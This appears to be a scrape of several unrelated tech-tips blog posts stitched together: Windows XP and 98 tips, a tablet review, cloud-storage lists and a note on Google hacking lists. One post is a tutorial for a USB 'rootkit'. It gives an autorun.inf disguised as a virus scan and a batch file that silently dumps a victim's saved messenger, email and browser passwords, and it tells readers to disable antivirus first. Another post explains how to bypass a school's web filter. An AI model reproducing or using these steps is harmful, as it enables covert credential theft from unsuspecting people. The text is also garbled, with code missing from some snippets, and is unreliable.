You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2003 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2004

I was screwing around with the command prompt one day in school, and realized I could access blocked sites, I decided to share because I like you guys.

1. Start>Run and type in cmd, if you don't have run on your start menu, read another school hacking tutorial to tell you how to access it.

2. Once your command prompt box opens, type "ping www.yoururlhere.com" (of course without the quotes.)

3.Press enter and you should see some numbers that looks like an IP address pop up, copy those numbers.

4. Open up your school internet browser, and type in those numbers that you copied in the command prompt. Now you can access your website!

india akash tablet Aakash Tablet Review Worlds Cheapest Tablet at US$ 28.99 from India [REVIEW]
No doubt aakash is the cheapest tablet available in the world but it has got lots of drawbacks which makes it not usable by technical guys who need multi tasking and high speed processor. In design point of view the tablet has got a simple design but is thick comparitively with the ipad and tabs like Dell Streak, Hp, Amazon Tablet  ‘Kindle Fire’, Samsung Galaxy Tab. The best thing about this tab (aakash) is its price which makes it affordable to the masses which is the main target of HRD Minister Kapil Sibal. It is expected that 416 Universities and 20,000 colleges all over India will be connected under the National Mission on Education through Information and Communication Technology (NME-ICT). The National Mission on Education through Information and Communication Technology (NME-ICT) has proposed 18 different line items for content creation. All content that is created under this Mission needs to meet the following criteria:
  • It should be related to education delivery.
  • It should involve faculty from different institutions
  • All IP (Intellectual Property) created under projects funded by this Mission will vest with MHRD
  • All content should be created using open-source software.
  • All content created under this Mission is for open access by all and cannot be charged for in any way

Where To Buy From

:
Commercially Aakash Tablets will be available in the market for the masses from November. Pre-booking of the Aakash Tablets have been started from now itself. You can even book your first World Cheapest Tablet now. Click here to book.

Government has annonced to distribute the Aakash-Tablets to various institute and students can avail one from their institute itself. So the best way to get one for you is contact your concerned department of your college/institute.
Please share this, if you liked it.

You must have gone through my earlier post “How to hack facebook account of a friend”. It was just a simple trick. This time, it’s a bit more powerful.
Have you ever imagined that a tiny USB/Pen Drive can be used as a deadly gadget for hacking passwords? Yes, it can be made possible. See below to find the truth.
The Windows operating system stores some of the mostly used passwords for the user for the general purposes. This includes a number of necessary applications:-
  • Useful and instant messenger MSN, AOL, g-talk etc.
  • The outlook express
  • SMTP, POP, FTP account
  • Auto-complete saved passwords for different web browsers like Internet Explorer, Firefox, google chrome etc.
Some applications/tools can be made to search for these saved passwords. All we need is a customized rootkit. Let’s see what will contain in our rootkit.
Massen Pass: It will recover all the passwords from the mostly used messenger applications like MSN Messenger, AOL Messenger, Yahoo Messenger, ICQ and many more.
Mail Pass view: It will recover the saved passwords from well-known e-mail clients like Microsoft Outlook express, Mozilla Thunderbird, Netscape Mail, IncrediMail, Eudora etc. Moreover, this Mail pass view can be used to recover the passwords of web-based e-mail accounts which include Hotmail, Yahoo!, Gmail etc. if the user is using the associated programs to access the accounts.
Web Browser Pass view: It will recover the passwords saved in all the web browsers installed in the PC. It includes all supported web browsers like Internet explorer, Google chrome, Mozilla Firefox, apple safari, Netscape browser, Opera etc.

Procedure for creating the customized rootkit:

NOTE : For the creation steps, first disable the antivirus.
  1. Extract the above discussed applications into the USB pendrive.     Download linksecure
  2. Create a notepad and just fill the content below into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Then save the notepad as autorun.inf and copy the newly created autorun.inf onto the USB pendrive.
*  Then create another notepad and paste the content below onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start webbrowserpassview.exe /stext webbrowserpassview.txt
*  Then save the said notepad file as launch.bat
*  Copy the launch.bat to the USB pendrive as you have done earlier.
*  That’s it. The rootkit is ready to operate and explore onto the victim’s computer.

Steps to follow:

  1. After inserting the pendrive, an autorun window shall pop-up. Just select the first option of performing a virus scan.
  2. Now all the pre-programmed applications will do their work of collecting passwords in the background and stored in .txt files.

Steps to safe yourself from these dirty tricks :

1. Don’t go for any pop-up provided scanning procedure. Always go for scanning by antivirus only from the antivirus window.
2. Keep your antivirus updated regularly.
WARNING: Me or Prem-verma.blogspot.com is not responsible for any kind of damage caused by the above provided information. The above tutorial is completely safe to use. It will do no harm to the PC. The sole motive of this tutorial is to help you recover the forgotten saved passwords.

# Now press the '~' given on the keyboard. Note that there is no need to press shift, ctrl or alt.

How to write the Rupee symbol on webpage.
You can do this in two ways ..
1. Using JavaScript.
add this JavaScript line in your head part of HTML page

2. Using style sheet
link your page with the external stylesheet by adding this link

now add this code line for writing symbol

I like to use JavaScript method for writing the symbol because it changes all the Rupee symbol. You need not to put extra effort on this.

IS YOUR HARD DISK FULL
DONT WORRY STORE DATA ONLINE FOR FREE

1) Windows Live SkyDrive : Windows Live SkyDrive which debuted as Windows Live Folders also offers a pretty good amount of 25GB storage space. It’s more reliable and secured. You have to sign up using your Windows Live Id or Hotmail Id. the best part of it is you can access files from your mobile device as well as you can compress and download all your files as a compressed archive. The files can also be specified as public or private with links for sharing as well.

2) Google : Google’s various services like mail docs and Picasa together contribute to have a storage space of about 10 GB which is constantly increasing. By installing a simple extension we can use 7.5 GB Google’s email space as Hard Disk in our PC. Just install it and follow the instructions given and will show up as a separate hard disk in My Computer. very easy to use
3) Adrive : Adrive is another online file storage service with a whopping 50 GB of free storage and can extended to 10 TB with payment.
4) Dropbox : Dropbox can be used as client side software on our PC which offers 2 GB of online storage. Just install the software and drag and drop files to upload. The software will automatically upload all of your files when the computer is idle. The transmission of file data occurs over an encrypted channel (SSL) and all files are encrypted which is an added bonus. It even works with all major mobile platforms. good one
5) Amazon cloud Drive : If you just want a virtual drive for uploading videos, music docs or photos, you can use the Amazon Cloud drive. Your files can be neatly classified into categories in pre-existing folder structures and the service offers 5 GB of free space. However, files above 2 GB in size cannot be uploaded.

Have you wondered is there any app that can just lock off your computer without having to touch the keyboard?
Well, there is.
here is the application for you all
BtProx ( http://btprox.sourceforge.net/) is a free application that monitors the proximity of your computer to your cellphone or other bluetooth device . It will lock off your computer automatically, protecting its contents from prying eyes when the phone goes out of range which means you walk away from your computer. Obviously, you would take your cellphone you when you leave, wouldn't you? It will also unlock automatically when you return back, with your cellphone or other bluetooth device of course.
this is not all also with BtProx, you can set up an arrangement that automatically locks your computer and turns on the PC security system when you step away from the machine.

feel free to leave your comments...........
if you know some good applications you can write us.

How to Prepare the Hard Disk for the Windows 98 Installation Procedure

WARNING: The following information applies to preparing an empty hard disk for the installation of Windows 98. If you use the following steps on a hard disk that is not empty, all of the data that is on that hard disk is deleted.

Before you install Windows 98 on an empty hard disk, you must first create a primary partition and then format a file system on that partition. Each allocated space on the hard disk (primary partition or logical drive) is assigned a drive letter. Windows 98 supports the FAT16 and FAT32 file systems. When you run the Fdisk tool on a hard disk that is larger than 512 MB, you are prompted to choose a file system.

The FAT16 file system has a maximum of 2 gigabytes (GB) for each allocated space, or drive letter. For example, if you use the FAT16 file system and you have a 6-GB hard disk, you can have three drive letters (C, D, and E), each with 2 GB of allocated space.

The FAT32 file system supports drives up to 2 terabytes in size and stores files on smaller sections of the hard disk than does the FAT16 file system. This results in more free space on the hard disk. The FAT32 file system does not support drives that are smaller than 512 MB. For additional information about the FAT32 file system, click the article numbers below to view the articles in the Microsoft Knowledge Base:
154997  Description of the FAT32 File System
118335  Maximum Partition Size Using FAT16 File System
More information about file systems is also available in the "Getting Started" manual that is included with the Windows 98 CD-ROM.

For additional information about the Fdisk tool, click the article number below to view the article in the Microsoft Knowledge Base:
66706  The Four Steps Needed to Make a Hard Disk Usable

How to Partition the Hard Disk

After you decide which file system you want to use, run the Fdisk tool:
  1. Insert the Windows 98 Startup disk in the floppy disk drive, and then restart your computer.
  2. When the Microsoft Windows 98 Startup menu is displayed, choose the Start computer without CD-ROM support option, and then press ENTER.
  3. At a command prompt, type fdisk, and then press ENTER.
  4. If the hard disk is larger than 512 MB, you receive the following prompt:
Your computer has a disk larger than 512 MB. This version of Windows includes improved support for large disks, resulting in more efficient use of disk space on large drives, and allowing disks over 2 GB to be formatted as a single drive.

IMPORTANT: If you enable large disk support and create any new drives on this disk, you will not be able to access the new drive(s) using other operating systems, including some versions of Windows 95 and Windows NT, as well as earlier versions of Windows and MS-DOS. In addition, disk utilities that were not designated explicitly for the FAT32 file system will not be able to work with this disk. If you need to access this disk with other operating systems or older disk utilities, do no enable large drive support.

Do you wish to enable large disk support (Y/N)?
If you want to use the FAT32 file system, press Y, and then press ENTER. If you want to use the FAT16 file system, press N, and then press ENTER.
  5. After you press ENTER, the Fdisk Options menu is displayed. Press 1 to select the Create DOS partition or Logical DOS Drive option, and then press ENTER.
  6. Press 1 to select the Create Primary DOS Partition option, and then press ENTER.
  7. After you press ENTER, you receive the following prompt:
Do you wish to use the maximum available size for primary DOS partition?
    FAT32 File System:

    1. If you chose the FAT32 file system in step 4 and you want all of the space on the hard disk to be assigned to drive C, press Y, and then press ENTER.
    2. Press ESC, and then press ESC to quit the Fdisk tool and return to a command prompt.
    3. Skip to step 10.
    FAT16 File System:

    1. If you chose the FAT16 file system in step 4, and you want the first 2 GB on the hard disk to be assigned to drive C, press Y, and then press ENTER.
    2. Press ESC to return to the Options menu, and then skip to step i.
    3. If you want to customize the size of the partitions (the logical drives) on the hard disk, press N, and then press ENTER.
    4. A prompt is displayed for you to type the size that you want for the primary partition in megabytes or percent of disk space. Note that for a Windows 98-based computer, Microsoft recommends that you make the primary partition at least 500 MB. Type the size of the partition that you want to create, and then press ENTER.
    5. Press ESC to return to the Options menu.
    6. Press 2 to select the Set active partition option, and then press ENTER.
    7. When you are prompted to type the number of the partition that you want to make the active partition, press 1, and then press ENTER.
    8. Press ESC to return to the Options menu.
    9. To assign drive letters to the additional space on the hard disk:
      1. Press 1, and then press ENTER.
      2. Press 2 to select the Create Extended DOS Partition option, and then press ENTER.
      3. The option that appears displays the maximum space that is available for the extended partition. You can adjust the size of the partition or you can use the default size. Note that the default maximum space is recommended, but the space can be divided between multiple drive letters. Type the amount of space that you want, press ENTER, and then press ESC.
      4. The Create Logical DOS Drive(s) in the Extended DOS Partition menu is displayed. This is the menu that you use to assign the remaining hard disk space to the additional drive letters. Type the amount of space that you want to assign to the next drive letter at the Enter logical drive size in Mbytes or percent of disk space (%) prompt, and then press ENTER.
      5. A table that lists the drive letter that you created and the amount of space that is on that drive is displayed. If there is still free space on the hard disk, it is displayed near the bottom of the table. Repeat steps 1 through 4 until you receive the following message:
All available space in the Extended DOS Partition is assigned to local drives
      6. After you receive this message, press ESC, and then press ESC to quit the Fdisk tool and return to a command prompt.
  8. After you create the partitions, restart you computer with the Windows 98 Startup disk in the floppy disk drive.
  9. When the Windows 98 Startup menu is displayed, choose the Start computer without CD-ROM support option, and then press ENTER.
  10. When a command prompt is displayed, type format c:, and then press ENTER.

NOTE: If you receive a "Bad command or file name" message, you may need to extract the Format.com utility to your Startup disk. To do this, type the following command at a command prompt, and then press ENTER:
    extract ebd.cab format.com
After the Format.com utility is extracted to your Startup disk and a command prompt is displayed, type format c:.
  11. When you successfully run the Format.com utility, you receive the following prompt:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!

    Proceed with Format (Y/N)?
Press Y, and then press ENTER to format drive C.
  12. After the format procedure is finished, you receive the following prompt:
Volume label (11 characters, ENTER for none)?
This is an optional feature that you can use to type a name for the hard disk. Type an 11-character name for the drive, or leave it blank, and then press ENTER.
  13. Repeat steps 10 through 13 for any additional drive letters that you created in step i.

How to Install Windows 98

After you partition and format your hard disk, you can install Windows 98:
  1. Insert the Windows 98 Startup disk in the floppy disk drive, and then restart your computer.
  2. When the Windows 98 Startup menu is displayed, choose the Start computer with CD-ROM support option, and then press ENTER.
  3. If CD-ROM support is provided by the generic drivers on the Startup disk, you receive one of the following messages, where X is the drive letter that is assigned to your CD-ROM drive:
    Drive X: = Driver MSCD001

    Drive X: = Driver OEMCD001
NOTE: If your CD-ROM drive is not available after you boot from the Windows 98 Startup disk, install the CD-ROM drivers that are included with your CD-ROM drive. For information about how to obtain and install the most current driver for your CD-ROM drive, view the documentation that is included with your device, or contact your hardware manufacturer.
  4. Insert the Windows 98 CD-ROM in the CD-ROM drive, type the following command at a command prompt, and then press ENTER
    X:\setup
where X is the drive letter that is assigned to your CD-ROM drive.
  5. When you receive the following message, press ENTER, and then follow the instructions on the screen to complete the Setup procedure:
Please wait while the Setup initializes. Setup is now going to perform a routine check on your system. To continue press Enter.

This assumes that you have a good working boot disk.  And that you wish to start with a freshly formatted hard drive.

This assumes that you only have one hard drive and that you plan to use only one partition i.e. drive "C".  Down the road I plan to add a page discussing disk partitioning schemes.  But for now, if you want/need further info on this subject please email me. There are two methods that I like to use.  Both assume a good working boot disk.  This includes being able to see/read a CD-ROM with it.  Also that you want to format your hard drive and there is no (NONE) info on this drive that you need/want to save.  Please note, when you format a hard drive you will lose all data on that drive!  If you are using the Win98 "upgrade" CD you will need to have your Windows 3.1 or WFWG 3.11 floppy disk one available. (You may wish to verify that you can read from this disk before starting)

NOTE: For Win98 if you're using the "upgrade" CD you can use a Win95 upgrade CD during the verification phase. If you use floppies you'll need the whole set! (what a pain!)  If you're using a CD for the "DOC" check, only point to the drive the CD is on, DO NOT drill into any sub-folder!

A couple of other possible concerns:
  1. If you have an older computer and you've added/replaced your existing hard drive with a newer/larger one then ask yourself/find out if you're using a "drive overlay" program.  If you are then there are different steps you must follow!  Contact the maker of you drive overlay software for more info.
  2. If you have either a SCSI CD-ROM or a SCSI hard drive then you may need to do things differently.  My SCSI knowledge is very weak so please be careful if you wish to use my methods.

  Method one

***This is my prefered method.***

by Prem verma

With your computer turned off, insert the boot disk.
  1. Turn on the computer.
When the computer's booted up do the following...
  2. type FDISK /MBR hit enter
(this destroys the master boot record and re-creates it.  You should not see anything on the screen.)
  3. type FORMAT C: /U /S hit enter
(this will format your hard drive and "SYS" it.  This means install the system files needed to boot up.  When it's done you may enter a name for this drive if you wish.)
  4. Reboot the computer with the boot disk.
  5. Type C: hit enter
  6. Type MD CABS hit enter
  7. Type X: hit enter
(where "X" is the drive letter for your CD-ROM make sure your Win98 CD is in the CD-ROM drive!)
  8. Type CD WIN98 hit enter
  9. Type COPY *.* C:\CABS hit enter
(what you've done is, you've made a folder called "cabs" on your hard drive, then copied all the files needed from your Win98 CD-ROM to that folder.  This way you will install from your hard drive.  Then, in the future if Win98 needs any files, it will automatically get them from there.  Also I've found that some people have a problem getting their CD-ROM to be recognized by Win98.  If that were to happen during the Win98 installation, you wouldn't be  able to finish the install.  This method avoids this problem.)
  10. Reboot the computer without the boot disk.  NOTE: If you're using an upgrade CD to do the install, skip step 10, and start the install while you're booted off the bootdisk, this way you will have CD-ROM support when Windows wants proof.  At that point simply put your Win9x CD in, point to it in the browser, then put your install CD back in.  Remember to remove the boot disk before the next reboot!
  11. Type CD CABS hit enter
  12. Type SETUP hit enter
(here you go! just follow the on-screen instructions and (hopefully *grin*) you will successfully install Win98!)

Method two

With your computer turned off, insert the boot disk.
  1. Turn on the computer.
When the computer's booted up do the following...
  2. Type FDISK /MBR hit enter
(this destroys the master boot record and re-creates it. You should not see anything on the screen.)
  3. Type FORMAT C: /U hit enter
(this will format your hard drive when it's done you may enter a name for this drive if you wish.)
  4. Reboot the computer with the boot disk.
  5. Type X: hit enter
(where "X" is the drive letter for your CD-ROM)
  6. Type CD WIN98 hit enter
  7. Type SETUP hit enter
(and away you go. follow the on-screen instructions and good luck.)

Method three

For Win98 there is a third possible method to use.  You must have a 'puter that can boot from a CD-ROM.  (The Win98 CD-ROM is bootable.)  You may have to go into your CMOS to change some settings to enable this.   (Please look at your 'puter's manual or go to the manufacturers website to find out how to do this.)
  1. Boot the computer with the Win98 CD.
  2. Then follow the prompts.
I personally do not like this method!  While you can FDISK, and FORMAT with this method it tends to get very confusing.  If Win98 detects a current install of Win95 or Win3x it assumes you want to do an upgrade instead of a full install!  I feel that a fresh install is the only way to do it!

As always, other people have different ways of doing things. These are the methods I use. I find that a fresh install tends to be more reliable than "installing over the top".  I hope this helps, if this is too basic or too technical let me know and I'll do what I can to help you.

This master list of Google Hacking command sets has show up on a forum in Russia, as well as on Scribd. While we often forget about Google hacking, and rarely use it against our own sites, a list like this is going to keep the kids happy as they merrily pound their way through Google to your systems. This makes the data much more accessible than at Johnny I hack stuff.

There are some drawbacks in how Johnny I hack stuff works, you have to do a lot of clicking to get to the right hacks. This master list also includes things I have not seen or tried yet meaning that the body of knowledge for Google hacks is still being expanded upon. It has been a while since a really good Google hack has come out, but this list promises to keep me busy for a while.
